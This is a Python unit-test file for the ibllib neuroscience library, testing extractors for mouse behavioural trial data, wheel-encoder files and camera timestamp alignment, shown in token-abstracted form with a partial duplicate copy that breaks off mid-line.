Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n 
self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in 
data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = 
biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = 
next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, 
np.polyval(drift_pol, t0_) + t0_)\n        t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n        t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n        t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.main_path = Path(__file__).parent\n\n    def test_encoder_events_corrupt(self):\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_lt5(file_events)\n            self.assertTrue(dy.size > 6)\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = 
camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == 
len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def 
test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = 